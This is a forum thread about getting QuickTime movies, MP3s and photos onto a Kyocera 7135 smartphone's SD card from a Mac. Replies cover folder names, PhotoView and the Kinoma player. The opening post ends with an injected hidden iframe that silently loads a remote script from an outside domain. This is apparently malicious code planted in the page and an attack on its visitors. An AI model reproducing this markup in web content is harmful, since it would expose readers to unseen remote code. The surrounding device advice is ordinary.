+ Reply to Thread

Thread: 7135

I recently purchased a K-7135 palm smartphone. I work on Macintosh computers and so far I haven't found the 7135 very compatible with Mac compared to PC. (1) I have been trying to do is play quicktime movies, so far I haven't been able to see the data that I manually tranfered to my SD 256mb expansion card, let alone play anything. (2) The other task is playing mp3 audio files. The program on the 7135 only syncs with pc computers. So none of my mp3's have transfered over, and when I manually move to data to the expansion card, the 7135 doesn't recognize it. (3) Photosuite, the photo edit and viewing software seems to have the same problem. If anyone has any solutions for these three concerns, your help would be appricated!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Media Man

Are you copying all of your files into the root directory, if so that's part of your problem.

For Audio, create a folder called Audio and put the mp3's in there.

I'm not sure for photos, might be photo

For movies, do you have a program installed on the palm to play the movie? If might also have a specific directory to go in.

This should have been covered in the past, try searching for SD, directory for starters.

I made folders named audio and video and yes I am copying the files directly onto the media card into those folders. the phone has an mp3 player program and photosuite. I downloaded Tealmovie player but it seems to only recognize the Teal demo data. I am now researching SD on directory.
    Thanks.
    Media Man

Originally posted by Jedajeff
    I made folders named audio and video and yes I am copying the files directly onto the media card into those folders. the phone has an mp3 player program and photosuite. I downloaded Tealmovie player but it seems to only recognize the Teal demo data. I am now researching SD on directory.
    Thanks.
    Try a search on Teal movie, there was a good thread about tealmovie and kinoma, which is better, how to create movies, etc. I'm going to try to do it tonight myself.

The folder on the card for photos (which need to be in .jpg format) needs to be called DCIM. You need to use PhotoView to view them from the card. PhotoSuite only views them from the palm and only in .pdb format. To get PhotoView, if it's not on the phone already is to run the install for PhotoSuite and you will get a choice select the choice to install PhotoView along the way (of course this is the way the PC software works).

For MP3s, the folder on the card should be called AUDIO, the case may make a difference as I've always seen it in all caps and I set up both of the memory cards I have that way and it works just fine.

I haven't done any videos on my phone so I don't know if there is something special about that.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    For MP3s, the folder on the card should be called AUDIO, the case may make a difference as I've always seen it in all caps and I set up both of the memory cards I have that way and it works just fine.
    In my experience, it does not matter if it is all caps. Works either way for me.

Thanks for all the great info. Has anyone downloaded a quicktime and/or WMP onto their 7135? If yes, was your system mac or pc and how did you do it?
    Media Man

for video, do a search on Kinoma for more information...
    I wasn't here
    You don't know me

Yes, Quicktime, Mac OS X, Using Kinoma Player and producer. Works great!